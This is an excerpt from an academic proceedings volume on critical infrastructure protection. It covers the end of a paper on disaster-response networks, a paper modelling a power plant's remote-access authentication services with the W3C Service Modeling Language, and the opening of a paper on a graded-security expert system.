A further technical challenge is that the evaluation of a novel technology suffers from a lack of data collected over long time intervals and in realistic scenarios. Detection of attacks on a network depends on distinguishing normality from abnormality (in order to recognise unforeseen attack patterns). We also need to identify the expected traffic patterns and loads on such a network, to form a basis for evaluating novel routing protocols and recovery from node and link crashes.
3.4 Outlook
To deal with these challenges we must incorporate results from a variety of areas, such as wireless and delay-tolerant networking, fault-tolerant distributed systems, real-time systems, and security. We continue by presenting some of the interdisciplinary work being done to do just that, i.e., combining techniques from several different areas to provide disaster response infrastructures. We believe that one of the key insights required to provide communication in challenged networks is that disconnectivity is not an abnormal state. We already mentioned the area of delay-tolerant networking; it is currently being explored in many different directions, including interplanetary communication [16] and wildlife monitoring [44]. There are many directions for this research that are relevant in a disaster response context. We believe that two of the more urgent ones are (1) characterisations of node mobility that are as good as possible, and (2) timely and resource-efficient dissemination protocols. The Haggle project [9] has shown some interesting results in these directions, although much remains to be done. The RESCUE project [34] is a wide-spanning project involving several areas relating to crisis response. It tackles problems such as heterogeneity (organisational and technical), event extraction, and security. In a recent paper, Dilmaghani and Rao [15] paint a similar picture of the challenges and problems at hand. They also present a communication platform which allows wireless communication between small hand-held devices by routing traffic through a wireless mesh network. WORKPAD [11] is an ongoing European project with the aim of providing software and communication infrastructures for disaster management. It envisions a two-layer architecture in which the backend is composed of a peer-to-peer network, accessed by frontend devices connected in a mobile ad hoc network. The focus of the research in this project is on the backend, where knowledge and relevant data content are managed. Major disasters put a huge stress on medical personnel. Not only is there a rush of patients needing medical treatment, but care also has to be administered under adverse conditions regarding electricity and information supply. There are many ways the situation can be improved by new technologies. As an example, Gao et al. [19] have demonstrated a system in which each patient carries a monitoring device that continuously and wirelessly sends information about the patient's health. This way the medical personnel can monitor many patients simultaneously and react quickly to changes in their condition. Olariu et al. [37] present an architecture for a low-bandwidth wireless telemedicine system which is still able to transfer imaging data to a remote site. From the military domain there is a clear interest in ad hoc technologies for challenged environments. For example, the Swedish Armed Forces project GTRS (Common
Tactical Radio System) [3] seeks to benefit from SDR technologies to implement a tactical IP-based ad hoc network, bridging the gap between legacy communication equipment and modern devices using internationally standardised waveforms. The first demonstrator GTRS units were delivered to the Swedish Armed Forces during 2007, and delivery will continue until January 2014, when the system is scheduled for complete deployment both nationally and within the Nordic Battle Group. The first waveform delivered and tested for the GTRS system was Terrestrial Trunked Radio (Tetra), a mobile radio system designed primarily for emergency services and government use.
4 Summary and Conclusion
We have presented some challenges for the infrastructure systems of tomorrow. In particular, we have discussed the spontaneous infrastructures that will form in disaster response situations. There are many similarities between existing infrastructures and disaster response networks: human lives depend on their availability, time is of the essence, and there is an incentive to attack them. However, they are also very different. Disaster response infrastructures will have far fewer resources and need to be self-configuring and self-healing in order to be useful. On the other hand, attacks against these networks are also likely to be less sophisticated and smaller in scale. There are also other challenges which have not existed (at least to the same degree) in traditional infrastructures, such as mobility, disconnectivity, scarceness of resources, and heterogeneity. These issues have received some attention in the field of mobile ad hoc networks, which is starting to mature, moving away from synthetic scenarios with general but artificial mobility models. Instead, increasing research effort is being devoted to the problems which occur in particular application areas, each with their own characteristics. Disaster response networks are an instance of such an application area in which this research field can expand and improve. We believe that this emerging field has a lot to gain by looking into the research on protection of critical infrastructures. The reverse is also true: even stationary networks will need to adopt methods of self-adaptation and resilience to cope with the complexity and inherent instability of converging network technologies. Our own work in this area is directed towards finding systematic methods to design and evaluate resource-efficient protocols for disaster response management. Such an effort requires good characterisations of mobility and network connectivity, as well as distributed resource optimisation methods.
References 1. Adams, C.: Information sharing raises more questions than answers. AFCEA Signal Magazine (May 2008) 2. Amin, M.: Toward self-healing energy infrastructure systems. IEEE Comput. Appl. Power 14(1), 20–28 (2001) 3. Baddeley, A.: Sweden seeks military communications flexibility. AFCEA Signal Magazine (May 2006)
4. Balasubramanian, A., Levine, B., Venkataramani, A.: DTN routing as a resource allocation problem. SIGCOMM Comput. Commun. Rev. 37(4), 373–384 (2007) 5. Becker, J.C.: The opportunities and limits of technology in non profit disaster response. Keynote speech at the ISCRAM conference, Washington (May 2008) 6. Bengtsson, A., Westerdahl, L.: Access control in a coalition system. Technical Report FOIR–2393–SE, Swedish Defence Research Agency (December 2007) 7. Birman, K.: Technology challenges for virtual overlay networks. IEEE Transactions on Systems, Man and Cybernetics, Part A 31(4), 319–327 (2001) 8. Birman, K., Chen, J., Hopkinson, E., Thomas, R., Thorp, J., Van Renesse, R., Vogels, W.: Overcoming communications challenges in software for monitoring and controlling power systems. Proc. IEEE 93(5), 1028–1041 (2005) 9. Bruno, R., Conti, M., Passarella, A.: Opportunistic networking overlays for ICT services in crisis management. In: Proc. 5th International ISCRAM Conference. ISCRAM (2008) 10. Buchegger, S., Le Boudec, J.: Self-policing mobile ad hoc networks by reputation systems. IEEE Communications Magazine 43(7), 101–107 (2005) 11. Catarci, T., de Leoni, M., Marrella, A., Mecella, M., Salvatore, B., Vetere, G., Dustdar, S., Juszczyk, L., Manzoor, A., Truong, H.-L.: Pervasive software environments for supporting disaster responses. IEEE Internet Comput. 12(1), 26–37 (2008) 12. CRUTIAL. European FP6 project, http://crutial.cesiricerca.it/ 13. Denning, P.J.: Hastily formed networks. Commun. ACM 49(4), 15–20 (2006) 14. DIESIS. European FP7 project, http://www.diesis-project.eu/ 15. Dilmaghani, R., Rao, R.: A wireless mesh infrastructure deployment with application for emergency scenarios. In: Proc. 5th International ISCRAM Conference. ISCRAM (2008) 16. Farrell, S., Cahill, V.: Delay- and Disruption-Tolerant Networking. Artech House, Inc., Norwood (2006) 17. Fiore, M., Harri, J., Filali, F., Bonnet, C.: Vehicular mobility simulation for VANETs. In: Proc. 40th Annual Simulation Symposium (ANSS) (2007) 18. FORWARD. European FP7 project, http://www.ict-forward.eu/ 19. Gao, T., Pesto, C., Selavo, L., Chen, Y., Ko, J., Lim, J., Terzis, A., Watt, A., Jeng, J., Chen, B., Lorincz, K., Welsh, M.: Wireless medical sensor networks in emergency response: Implementation and pilot results. In: Proc. 2008 IEEE International Conference on Technologies for Homeland Security. IEEE, Los Alamitos (2008) 20. Ghorbani, A.A., Bagheri, E.: The state of the art in critical infrastructure protection: a framework for convergence. International Journal of Critical Infrastructures 4, 215–244 (2008) 21. Guimera, R., Amaral, L.: Modeling the world-wide airport network. The European Physical Journal B - Condensed Matter 38, 381–385 (2004) 22. Haas, Z.J., Small, T.: Evaluating the capacity of resource-constrained DTNs. In: Proc. 2006 international conference on Wireless communications and mobile computing (IWCMC). ACM, New York (2006) 23. Helal, A.A., Bhargava, B.K., Heddaya, A.A.: Replication Techniques in Distributed Systems. Kluwer Academic Publishers, Norwell (1996) 24. HIDENETS. European FP6 project, http://www.hidenets.aau.dk/ 25. IRRIIS. European FP6 project, http://www.irriis.org/ 26. Jefferson, T.L.: Using the internet to communicate during a crisis. VINE 36, 139–142 (2006) 27. Kostoulas, D., Aldunate, R., Pena-Mora, F., Lakhera, S.: A nature-inspired decentralized trust model to reduce information unreliability in complex disaster relief operations. Advanced Engineering Informatics 22(1), 45–58 (2008) 28. 
Kr¨ugel, C., Robertson, W.K.: Alert verification: Determining the success of intrusion attempts. In: Workshop the Detection of Intrusions and Malware and Vulnerability Assessment (DIMVA). German Informatics Society (2004)
Emerging Information Infrastructures: Cooperation in Disasters
269
29. Kuiper, E., Nadjm-Tehrani, S.: Mobility models for uav group reconnaissance applications. In: Proc. International Conference on Wireless and Mobile Communications (ICWMC) (2006) 30. Labovitz, C., Ahuja, A., Jahanian, F.: Experimental study of internet stability and backbone failures. In: Twenty-Ninth Annual International Symposium on Digest of Papers FaultTolerant Computing (1999) 31. Labovitz, C., Wattenhofer, R., Venkatachary, S., Ahuja, A.: Resilience characteristics of the internet backbone routing infrastructure. In: Proc. Third Information Survivability Workshop (2000) 32. Laprie, J., Kanoun, K., Kaniche, M.: Modeling interdependencies between the electricity and information infrastructures. In: Saglietti, F., Oster, N. (eds.) SAFECOMP 2007. LNCS, vol. 4680, pp. 54–67. Springer, Heidelberg (2007) 33. McHugh, J., Christie, A., Allen, J.: Defending yourself: the role of intrusion detection systems. IEEE Softw. 17(5), 42–51 (2000) 34. Mehrotra, S., Butts, C.T., Kalashnikov, D., Venkatasubramanian, N., Rao, R.R., Chockalingam, G., Eguchi, R., Adams, B.J., Huyck, C.: Project RESCUE: challenges in responding to the unexpected. In: Santini, S., Schettini, R. (eds.) Internet Imaging V, vol. 5304, pp. 179– 192. SPIE (2003) 35. Melby, J.: Jtrs and the evolution toward software-defined radio. In: MILCOM 2002, October 2002, pp. 1286–1290 (2002) 36. Nelson, S.C., Albert, I., Harris, F., Kravets, R.: Event-driven, role-based mobility in disaster recovery networks. In: Proc. second workshop on Challenged networks (CHANTS). ACM, New York (2007) 37. Olariu, S., Maly, K., Foutriat, E.C., Yamany, S.M., Luckenbach, T.: A Dependable Architecture for Telemedicine in Support of Diaster Relief. In: Dependable Computing Systems, pp. 349–368. Wiley, Chichester (2005) 38. Plagemann, T., Skjelsvik, K., Puzar, M., Drugan, O., Goebel, V., Munthe-Kaas, E.: Crosslayer overlay synchronization in sparse manets. In: Proc. 5th International ISCRAM Conference (2008) 39. ReSIST. Deliverable D12 resilience-building technologies: State of knowledge, ch. 2 (September 2006), http://www.resist-noe.org/Publications/Deliverables/ D12-StateKnowledge.pdf 40. Rinaldi, S., Peerenboom, J., Kelly, T.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Syst. Mag. 21(6), 11–25 (2001) 41. Saito, Y., Shapiro, M.: Optimistic replication. ACM Comput. Surv. 37(1), 42–81 (2005) 42. Sandulescu, G., Nadjm-Tehrani, S.: Opportunistic dtn routing with windows-aware adaptive replication (2008) (submitted for publication) 43. Shank, N., Sokol, B., Hayes, M., Vetrano, C.: Human services data standards: Current progress and future visions in crisis response. In: Proc. ISCRAM conference (May 2008) 44. Small, T., Haas, Z.J.: The shared wireless infostation model: a new ad hoc networking paradigm (or where there is a whale, there is a way). In: Proc. International Symposium on Mobile Ad Hoc Networking & Computing (MobiHoc). ACM, New York (2003) 45. Spyropoulos, T., Psounis, K., Raghavendra, C.S.: Spray and wait: an efficient routing scheme for intermittently connected mobile networks. In: Proc. SIGCOMM Workshop on Delaytolerant networking (WDTN). ACM, New York (2005) 46. Steckler, B., Bradford, B.L., Urrea, S.: Hastily formed networks for complex humanitarian disasters (September 2005), http://www.hfncenter.org/cms/KatrinaAAR 47. Svendsen, N., Wolthusen, S.: Analysis and statistical properties of critical infrastructure interdependency multiflow models. In: Proc. 
IEEE SMC Information Assurance and Security Workshop (IAW) (2007)
270
M. Asplund, S. Nadjm-Tehrani, and J. Sigholm
48. Swanson, M., Hash, J., Bowen, P.: Guide for developing security plans for federal information systems. Technical Report 800-18, National Institute of Standards and Technology (February 2006) 49. Szentivanyi, D., Nadjm-Tehrani, S.: Middleware support for fault tolerance. In: Mahmoud, Q. (ed.) Middleware for Communications. John Wiley & Sons, Chichester (2004) 50. Tschudin, C., Gunningberg, P., Lundgren, H., Nordstr¨om, E.: Lessons from experimental MANET research. Ad Hoc Networks 3(2), 221–233 (2005) 51. WOMBAT. European FP7 project, http://www.wombat-project.eu/
Service Modeling Language Applied to Critical Infrastructure

Gianmarco Baldini and Igor Nai Fovino

Institute for the Protection and the Security of the Citizen, Joint Research Centre, European Commission, via E. Fermi 1, Ispra, 21027, VA, Italy
Abstract. The modeling of dependencies in complex infrastructure systems is still a very difficult task. Many methodologies have been proposed, but a number of challenges still remain, including the definition of the right level of abstraction, the presence of different views on the same critical infrastructure, and how to adequately represent the temporal evolution of systems. We propose a modeling methodology where dependencies are described in terms of the services offered by the critical infrastructure and its components. The model provides a clear separation between services and the underlying organizational and technical elements, which may change over time. The model uses the Service Modeling Language proposed by the W3 consortium to describe a critical infrastructure in terms of interdependent service nodes, including constraints, behavior, information flows, relations, rules and other features. Each service node is characterized by its technological, organizational and process components. The model is then applied to a real case of an ICT system for user authentication. Keywords: Modeling, Critical infrastructures, Service.
1 Introduction
In this paper, we present a modeling approach where critical infrastructures can be described on the basis of the services they provide or depend upon. This is important for modeling intra-domain and inter-domain dependencies in CIs, because the dependency relationship is mostly based on the exchange of services rather than on physical association. The modeling of a system through services has a parallel in service engineering and ICT, where systems are built by creating a service-oriented architecture. In that case, the goal is to design a system by composing and orchestrating services implemented by software components and applications. In a similar way, the interaction of services or "features" in telecommunications systems is known as the "feature interaction problem" (see [4] and [5]). A potential risk, which hampered previous research approaches in feature interaction, is extreme formalism and the wish to represent all the levels of detail in the system. Eventually, the size of the state spaces and the resulting complexity make it impractical to model a large critical infrastructure. In the service-oriented approach, it is possible to choose the level of abstraction by selecting the type of elements of the critical infrastructures and the list of related services. For example, in an ICT infrastructure, we can model only the main communication nodes
(e.g., the Network Management system or the Billing system), or we can describe in detail the services offered by each software application (e.g., the routing functionality implemented by a network router). In the latter case, the level of complexity is impractical, and it is often not needed in order to determine the important dependencies. Our model is based on the following elements: a representation of the critical infrastructures as a composition of services, assets and dependencies; and a modeling language to represent the services and their interactions, based on SML and related W3C languages (XPath, Schematron and others) and implemented in XML. The rest of the paper is organized in the following sections: in Section 2, the Service Oriented Approach is described; in Section 3, the Service Modeling Language (SML) is presented; in Sections 4 and 5, we apply SML to the representation of the ICT architecture of a Power Plant.
2 Description of the Service Oriented Approach
Every system can be defined as a collection of entities collaborating to realize a set of objectives. Masera and Nai in [6] define the concept of dependency among components and sub-systems (e.g., a system object A depends on a system object B if B is required by A in order to accomplish its mission), and the concept of information flow as a set of point-to-point relationships describing the whole life cycle of an information item. Beyond the basic description of components, vulnerabilities, attacks etc., we see the need for a paradigm assisting in the interconnection of the different elements that need to be analyzed. To deal with this question, we make use of the concept of Service. In this light, objects in a system are producers/consumers of services. Basically, the service-oriented approach is composed of the following steps:
1) All the service nodes and assets in the critical infrastructure are listed and defined.
2) For each service node and asset, all service dependencies are computed and defined using the modeling language described in the following sections.
3) We combine the information from steps 1 and 2 to determine the "service chains" by exploring the service relationships associated to every service, while taking care of possible cyclic dependencies (see the sketch after this list).
4) We identify the end-users of the critical infrastructure, which services they use and which "service chains" are correlated. In this step, we also define how the same service provided by the critical infrastructure can have different levels of priority for different users ("differentiation"). For example, the electric power provided by the energy critical infrastructure to a hospital has a higher priority than that provided to a residential area.
5) Using the same modeling language, we can associate the vulnerabilities to the assets and the "service chains" in the critical infrastructure.
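As an illustration of steps 2 and 3, the following minimal sketch (in Python; not part of the original model) derives a service chain from per-service dependency lists while guarding against cycles. The service names loosely follow the example of Sections 4 and 5, but the dependency lists themselves are illustrative assumptions.

    # Illustrative dependency data: each service maps to the services it
    # directly requires (step 2 of the approach).
    SERVICE_DEPS = {
        "RPPC": ["VPN", "RCRD", "RCR", "RSCS", "Routing_service"],
        "VPN": ["Local_connection_service", "Routing_service"],
        "RCRD": ["RCE", "Radius_client_delivery"],
        "Radius_client_delivery": ["Local_connection_service", "DNS"],
        "RSCS": ["Routing_service", "DNS"],
        "Routing_service": ["Local_connection_service"],
        "DNS": ["Local_connection_service"],
    }

    def service_chain(service, deps, visited=None):
        # Depth-first exploration of the dependency relation; 'visited'
        # guards against cyclic or shared dependencies (step 3).
        if visited is None:
            visited = set()
        chain = []
        for dep in deps.get(service, ()):
            if dep not in visited:
                visited.add(dep)
                chain.append(dep)
                chain.extend(service_chain(dep, deps, visited))
        return chain

    print(service_chain("RPPC", SERVICE_DEPS))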
3 The Service Modeling Language
The W3 consortium (W3C) has faced a similar problem in tackling the complexity of large man-made infrastructures. W3C has proposed the creation of a Service Modeling Language to capture knowledge of complex IT services and systems in
machine-interpretable models. The Service Modeling Language (SML) provides a rich set of constructs for creating models of complex IT services and systems. A model in SML is realized as a set of interrelated XML documents. The XML documents contain information about the parts of the system, as well as the constraints that each part must satisfy for the system (or critical infrastructure) to function properly (from [1]). Constraints are captured in two ways:
1. Schemas: these are constraints on the structure and content of the documents in a model. SML uses a profile of XML Schema (see [2]) as the schema language. SML also defines a set of extensions to XML Schema to support inter-document references.
2. Rules: Boolean expressions that constrain the structure and content of documents in a model. SML uses a profile of Schematron and XPath for rules.
SML has been created to design complex IT systems and their services, not specifically to model critical infrastructures. A certain amount of tailoring is needed to apply SML to the Service Oriented Approach for Critical Infrastructures.
4 Description of the Example System to be Modelled
This section describes a real-world example of a power plant network and its remote access system. Fig. 1 shows the high-level architecture of a typical Power Plant network. From the networking perspective, it is possible to identify some major subsystems:
Power Plant Backbone: it is composed of all the network devices which allow the different subnets of the Power Plant to communicate.
Field Network: the network interconnecting the sensors and the actuators which directly interact with the Power Plant electro-mechanical devices.
Process Network: this network hosts all the SCADA systems. By using these systems, the Plant Operators manage the whole Power Plant, sending control commands to the sensors in the Field Network and reading plant measurements and parameters.
Data Exchange Network: this area hosts a set of "data exchange" servers, which receive data from the Process Network and make them available to the operators who work in the Power Plant Intranet.
Power Plant Intranet: this is the branch of the Company network (Windows domain based) that provides intranet services to the Power Plant Operators. It is used not only to conduct "office work", but also to keep the Power Plant under remote control, by accessing, through a VPN authentication, the DMZ and the Process Network of a target Power Plant.
Internet: this network is the "rest of the world". In the architecture, remote operators can connect to the Power Plant, e.g. for maintenance matters, through a RADIUS authentication over a site-to-site VPN network.
5 Application of SML to Describe the Example System
This section describes how to apply SML and related languages to represent the real-case system described in the previous section.
Fig. 1. ICT architecture of a Power Plant
The table in Fig. 2 provides a brief description of the services needed to implement the remote connection service, a description of the dependencies and the mapping to the related service nodes. The service nodes are the RADIUS Server, the Network Access Server and the WinDomain Server. The following SML definitions must be provided:
1. Definition of simpleTypes and complexTypes
2. Definition of serviceNode elements
3. Definition of service node instances identified by URI

<xs:complexType name="ServiceType">
  <xs:sequence>
    <xs:element name="Name" type="xs:string"/>
    <xs:element name="Status" type="xs:StatusType"/>
    <xs:element name="DependentServices" minOccurs="0">
      <xs:complexType>
        <xs:sequence>
          <xs:element ref="tns:ServiceRef" maxOccurs="unbounded"/>
        </xs:sequence>
      </xs:complexType>
    </xs:element>
  </xs:sequence>
</xs:complexType>

<xs:complexType name="End-Users">
  <xs:sequence>
    <xs:element name="Name" type="xs:string"/>
    <xs:element name="Role" type="xs:UserRole"/>
    <xs:element name="UsedServices" minOccurs="0">
      <xs:complexType>
        <xs:sequence>
          <xs:element ref="tns:ServiceRef" maxOccurs="unbounded"/>
        </xs:sequence>
      </xs:complexType>
    </xs:element>
  </xs:sequence>
</xs:complexType>
The energy service can be considered a special type of service with additional attributes. EnergyServiceType is then a type derived from ServiceType. This can be described using the extension mechanism of XML Schema:
<complexType name="EnergyServiceType">
  <complexContent>
    <extension base="sml:ServiceType">
      <sequence>
        <element name="maxPower" type="xs:integer"/>
        <element name="duration" type="xs:integer"/>
      </sequence>
    </extension>
  </complexContent>
</complexType>
"maxPower" is the maximum electric power, in watts, which the energy service can provide. "duration" is how long (in hours) the service can provide the electric power. For both attributes a value can be defined.
Service Name / Description of Service / Depends on / Associated Service Node:

Remote_power_plant_control (RPPC): the high-level service used by the remote users in order to control the Power Plant remotely. Depends on: VPN, RCRD, RCR, RSCS, Routing service; GF (not critical). Service node: Network Access Server.

VPN: this service is needed by the RPPC in order to protect the remote control flows from eavesdroppers and from malicious agents. Depends on: Local_connection_service, Routing service. Service node: Network Access Server.

Gateway_Filtering_service (GF): this service is not necessarily required by the RPPC and VPN services; however, a GF disservice could cause major disservices to the VPN and the RPPC. Service node: Network Access Server.

Radius_client_request_delivery (RCRD): this high-level service takes the request from the RCR service, builds up the request packet and delivers it to the Radius_server_receiver service. Its failure completely compromises the RPPC service. Depends on: RCE, Radius_client_delivery. Service node: Network Access Server.

Radius_client_reception (RCR): provided by the RADIUS client, this service constitutes the first step of the RADIUS authentication schema presented in the previous section. Its failure completely compromises the RPPC service. Service node: Network Access Server.

Radius_client_encryption (RCE): it encrypts the data received from the remote clients using the public keys of a target RADIUS server. It is needed by the RCRD service; its failure completely compromises the RCRD. Service node: Network Access Server.

Radius_client_delivery: it takes the properly forged request packet from the RCE service and delivers it to the RADIUS server by using low-level services such as the Local_connection_service and the DNS service. Its failure directly compromises the RCRD service. Depends on: Local_connection_service, DNS. Service node: Network Access Server.

Radius_server_request_reception (RsRR): it receives the requests from the RADIUS client. A disservice here could downgrade or completely fail the authentication process, and then the RPPC. Service node: Radius Server.

Radius_server_validation (RSV): this high-level service takes as input the data received by the RsRR service and validates the login and password of the user. It is mandatory for the RPPC service. Depends on: RSD, RSLA. Service node: Radius Server.

Radius_Server_Decryption (RSD): this low-level service is used by the RSV in order to verify the authenticity of the received packets and to decrypt their content. A disservice at this level directly impacts the RSV service. Service node: Radius Server.

Radius_Server_login_authentication (RSLA): it takes the decrypted packets and sends them for validation to the Windows domain server. It uses the Local_connection service and the DNS service; a disservice of one of these two low-level services will compromise the RSLA. Depends on: Local_connection_service, DNS. Service node: Radius Server.

Win_domain_authentication (WDA): it receives a request from the RADIUS server containing the user credentials to be validated, checks its Active Directory database and sends the results of the validation back to the RADIUS server. Depends on: Local_connection_service, DNS, Active_Directory. Service node: WinDomain Server.

Radius_Server_connection_setup (RSCS): if the validation is positive, it "virtually" provides the remote client with all the information required in order to properly set up the remote connection and the virtual "domain extension". Depends on: Routing service, DNS. Service node: Radius Server.

Remote_client_parameters_setup: it receives as input a proper information token from the RSCS and properly configures the remote client. Its failure directly impacts the RPPC service. Service node: Radius Server.

Energy_service: the local service needed by every device in order to work. All the devices involved in the analyzed distributed system need this service. Service node: all service nodes.

Local_connection_service: the service providing the basic local network connection through the local switches, routers and gateways. Needed for all client-server communications. Service node: all service nodes.

DNS Service: its presence is needed if the RADIUS client has a mnemonic name; otherwise, if it is accessed through the specification of its IP address, it is not vital for the RPPC service. Depends on: Local_connection_service. Service node: all service nodes.

Routing service: provided by the routers over the public network, it routes the packets to the proper destination. Its failure completely compromises the RPPC service. Depends on: Local_connection_service. Service node: all service nodes.
Fig. 2. Service Nodes and Services
Each element and service is defined by a unique URI Id. In the URI, the values for each attribute are defined, including the provided services listed in the table.

<ServiceNode>
  <Name>RADIUS Server</Name>
  <Status>Active</Status>
  <ProvidedServices>
    <Service sml:uri="/PowerPlant/IT/Services/RSRR.xml"/>
    <Service sml:uri="/PowerPlant/IT/Services/RSD.xml"/>
    <Service sml:uri="/PowerPlant/IT/Services/RSLA.xml"/>
    <Service sml:uri="/PowerPlant/IT/Services/RSV.xml"/>
  </ProvidedServices>
</ServiceNode>
In turn, the URIs of the services are defined. Because of the page limits of this article, only one example of a Service URI is provided; the others can be defined in a similar way:
<Service>
  <Name>RCRD</Name>
  <Status>Active</Status>
  <DependentServices>
    <Service sml:uri="/PowerPlant/IT/Services/RSD.xml"/>
    <Service sml:uri="/PowerPlant/IT/Services/RSLA.xml"/>
    <Service sml:uri="/PowerPlant/IT/Services/RSV.xml"/>
  </DependentServices>
</Service>
Through the service dependencies, the service nodes are related, because they are providers of services. We can now define a number of rules using Schematron. For example, one simple rule is that the NeededPower of the service node should be less than or equal to the power provided by the PrimaryEnergyRef. This can be described in the following way:

<sch:rule context=".">
  <sch:assert test="NeededPower &lt;= PrimaryEnergyRef/maxPower"/>
</sch:rule>

Another rule can state that the status is not valid if the count of Events which are present is greater than 0:

<sch:rule context=".">
  <sch:report test="count(Event) &gt; 0"/>
</sch:rule>

An alternative approach is to describe the dynamic relationship among Events and Services using WS-CDL. As we described before, an important feature of a modeling language is the capability to represent user differentiation: how the same service may have different service level agreements with different users. For example, the operator end-user needs a VPN with a HIGH level of security, while a Basic User can have any level of security. This can be represented using the following Schematron rule:
An alternative approach is to describe the dynamic relationship among Events and Service using WS-CDL. As we described before, an important feature of a modeling language is the capability to represent the user differentiation: how the same service may have different service level agreement with different users. For example the operator end-user needs a VPN with HIGH level of security while a Basic User can have any level of security. This can be represented, using the following Schematron rule: <sch:pattern id="UsersVPNPattern"> <sch:ns prefix="u" uri="... ." /> <sch:rule context="End-Users> <sch:assert test="(@Role = ’Operator’ and UsedServices/ServiceRef/SecurityLevel = ’HIGH’) or @Role != ’Operator’">
Alternatively, we could use the WS-WSLA language to represent the Service Level Agreements (see [7]). In WS-WSLA, we have to define the involved parties (End-Users and ServiceNodes), the Service Definition (the VPN connectivity service) and the Obligations (that the Operator needs the VPN with HIGH security). Parties and services can be defined in a similar way to SML, including the definition of roles, extensions and other features. The obligations are defined through predicates, in a similar way to Schematron. In comparison to SML, WS-WSLA provides a larger set of predefined types and metrics to evaluate the level of service level agreements. The level of trust and security in the exchange of information across service nodes can be represented using a Schematron rule or by using the WS-Policy specification (see [8]). WS-Policy allows web services to use XML to advertise their policies on security, Quality of Service and so on.
6 Future Developments
The SML representation of the real-case system presented in this paper could be further enriched by increasing the level of abstraction and modeling the entire Power Plant and its interdependencies with the Power Generation and Distribution infrastructure. As described in Section 2, the system can be represented as a "network" of services, where service dependency chains can be clearly identified and formally described using SML and other W3C languages. The objective is to use the model to discover consistency gaps and vulnerability chains and to provide
a clear definition of intra-domain and cross-domain dependencies with the related service level agreements (explicitly or implicitly defined). The output will be compared with the results of similar modeling efforts to evaluate the quality of the service-oriented approach on the basis of parameters such as the robustness of the model to infrastructure changes and evolution, the identification of vulnerabilities, the completeness of the representation and so on.
7 Conclusion
Within the limits of the allowed space, the purpose of this paper was to present the service modeling approach for representing critical infrastructures, and to show how SML and related W3C languages can be used to support this approach. The approach can be used to model even very large infrastructures by selecting the proper level of abstraction. The model can be expanded incrementally, as built-in validation rules and constraints will ensure the integrity of the representation at any iteration. W3C languages like SML are also evolving and expanding, and the modeling capabilities will be further enriched.
References
1. Service Modeling Language (W3C) Version 1.1, W3C Working Draft 3 March (2008), http://www.w3.org/TR/sml (last accessed August 28, 2008)
2. XML Schema Structures and Datatypes Schema 1.1, http://www.w3.org/XML/Schema (last accessed August 28, 2008)
3. ISO Schematron Version 1.5, http://www.schematron.com (last accessed August 28, 2008)
4. Calder, M., Kolberg, M., Magill, E.H.: Feature Interaction: A Critical Review and Considered Forecast. Computer Networks: The International Journal of Computer and Telecommunications Networking 41(1) (January 2003)
5. Bowen, T., Dworack, F.S., Chow, C.H., Griffeth, N., Herman, G.E., Lin, Y.-J.: The feature interaction problem in telecommunications systems. In: Seventh International Conference on Software Engineering for Telecommunication Switching Systems, SETSS 1989, July 3-6, pp. 59–62 (1989)
6. Masera, M.: Interdependencies and Security Assessment: a Dependability view. In: Proceedings of the IEEE Conference on Systems, Man and Cybernetics, Taipei, October 8-11 (2006)
7. Web Service Level Agreement (WSLA) Language Specification version 1.0, http://researchweb.watson.ibm.com/wsla (last accessed August 28, 2008)
8. Web Services Policy Specification version 1.5, http://www.w3.org/2002/ws/policy (last accessed August 28, 2008)
9. Web Services Choreography Description Language Version 1.0, http://www.w3.org/2002/ws/chor (last accessed August 28, 2008)
Graded Security Expert System

Jüri Kivimaa (1), Andres Ojamaa (2), and Enn Tyugu (2)

(1) Estonian Defence Forces Training and Development Centre of Communication and Information Systems, Tallinn, Estonia
[email protected]
(2) Institute of Cybernetics at TUT, Tallinn, Estonia
[email protected], [email protected]

Abstract. A method for modeling graded security is presented and its application in the form of a hybrid expert system is described. The expert system enables a user to select security measures in a rational way, based on a Pareto optimality computation that uses dynamic programming to find points of the Pareto optimality curve. The expert system provides a rapid and fair security solution for a class of known information systems at a high comfort level.
1 Introduction
Graded security measures have been in use for a long time in high-risk areas like nuclear waste depositories, radiation control, etc. [1]. Also in cyber security, it is reasonable to apply a methodology that enables one to select rational security measures based on graded security, taking into account the available resources, instead of using only the hard security constraints prescribed by standards. It is well known that complete (100%) security of an information system is impossible to achieve, even at high cost. A common practice is to prescribe the security requirements that have to be guaranteed with a sufficiently high degree of confidence for various classes of information systems. This is the approach of most security standards, e.g. [2]. However, a different approach is possible when protecting a critical information infrastructure against cyber attacks: one may have the goal of providing the best possible defense with a given amount of resources (at the same time considering the standard requirements). This approach requires a considerable amount of data that connects security measures with the required resources, and security measures with the provided degree of security. Practically, only coarse-grained security can be analyzed in such a way at present, using a finite number of levels (security classes) as security metrics. This is the basis of the graded security methodology. This approach has been successfully applied in banking security practice and included in at least one security standard [3]. The ideas of graded security are based on the US Department of Energy security model from 1999 [4] and its updated version from 2006 [5]. The graded security model itself is intended to help determine a reasonable set of needed security measures according to the security requirements levels.
However, in practice it can be the case that there are not enough resources to achieve the baseline. In this case it is still desirable to invest the limited amount of resources as effectively as possible, i.e. to find and apply an optimal set of security measures. The data required for estimating required resources and security measures can be presented in the form of expert knowledge in an extendable expert system. At present, this expert system can include at least the data that have been used in the banking security design, in particular in a branch of the Swedish bank SEB. Using an expert system has the advantage that it provides flexibility in selecting the required values for the security analysis – the values can be selected based on various input data, and even default values can be used in some non-critical places. The present paper is organized as follows: the graded security model is presented in Section 2, the optimization method for finding a Pareto optimal curve depending on available resources is described in Section 3, and Section 4 gives a brief overview of the whole software system together with a demo example of security analysis.
2 Graded Security Model
In the present section we briefly explain the basic concepts of the graded security model: security goals, classes and measures, as well as the costs related to the security measures. We use an integrated security metric for representing the overall security of a system, and we explain the way these entities are related. Conventional goals of security are confidentiality, integrity, availability, and non-repudiation. In this presentation, which is based mainly on banking security, we use the following four slightly different security goals: confidentiality (C), integrity (I), availability (A) and satisfying mission criticality (M). (The latter two are in essence two aspects of availability.) The model can be extended by including additional security goals. A finite number of levels is introduced for each goal. At present, we use four levels 0, 1, 2, 3 for representing required security, but the number of levels can vary for different measures. The lowest level 0 denotes the absence of requirements. The security class of a system is determined by the security requirements that have to be satisfied. It is determined by assigning levels to goals, and is denoted by the respective tuple of pairs, e.g. C2I1A1M2 for a system that has the second level of confidentiality C, the first level of integrity I, etc. To achieve the security goals, some security measures have to be taken. There may be a large number of measures, so it is reasonable to group them into security measures groups. Let us use the following nine groups in our simplified examples, which are based on an educational information assurance video game CyberProtect [6]: user training (1), antivirus software (2), segmentation (3), redundancy (4), backup (5), 